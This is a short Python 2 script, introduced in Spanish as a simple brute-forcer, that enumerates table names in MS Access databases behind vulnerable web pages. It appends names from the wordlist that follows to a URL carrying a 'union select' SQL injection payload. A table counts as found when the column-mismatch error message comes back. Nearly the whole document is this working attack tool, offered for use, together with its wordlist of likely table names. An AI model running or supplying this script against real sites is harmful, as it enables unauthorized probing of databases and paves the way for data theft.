Un simple rute force de MSaccess usando una lista de palabras predefinidas
access-brute.py
import sys
import os
import urllib
from urllib import urlopen
os.system("cls")
print "Access Table Brute v1 Written by nova"
print "-------------------------------------"
print
print "Usage: access-brute.py url"
print "Eg. access-brute.py http://host.com/viewproduct.asp?id=1+union+select+1+From+\n"
url = sys.argv[1]
substring = "The number of columns in the two selected tables or queries of a union query do not match"
print url
print
print "Tables:\n"
print "-------"
f = open("tester.txt",'r')
for line in f:
feeddata = urllib.urlopen(url+line).read()
s = feeddata
x = s.count(substring)
if (x > 0):
print line
print "-------------"
print "scan complete"
wordlist
admin
users
customers
customer
members
clients
tblusers
tbluser
ordermain
orders
sales
stores
titles
msysobjects
MSysAccessObjects
MSysAccessXML
MSysACEs
MSysQueries
MSysRelationships
Northwind
wtblObjectList